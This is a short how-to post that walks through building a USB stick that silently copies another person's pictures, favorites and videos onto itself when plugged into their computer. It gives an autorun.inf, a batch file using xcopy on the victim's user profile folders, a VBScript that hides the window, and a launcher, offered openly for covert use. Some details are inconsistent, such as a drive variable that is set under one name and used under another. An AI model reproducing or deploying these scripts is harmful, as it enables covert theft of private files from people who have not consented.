So, imagine that someone has a file in they computer and for whatever reason you want that file but you can’t ask for it. How to do it? How simply it would be to just plug your USB stick into they PC and secretly copy files to your USB stick. Is it possible? YES!
Open Notepad or Notepad++, and copy-paste the following lines.
- action=Click OK to Run
Save this as autorun.inf
Open Notepad again and copy-paste the following lines
- @echo off
- :: variables
- SET odrive=%odrive:~0,2%
- set backupcmd=xcopy /s /c /d /e /h /i /r /y
- echo off
- %backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
- %backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
- %backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
- @echo off
Save this as file.bat
You can edit above file as per your requirements.
- Open Notepad once again and copy-paste the following line.
- CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Save this as invisible.vbs
Open Notepad one last time and copy-paste the following line.
- wscript.exe \invisible.vbs file.bat
Save this as launch.bat
Copy all 4 files created in the above steps and put it on the root of the Flash drive, and then also create a folder named “all” where the contents are to be copied automatically.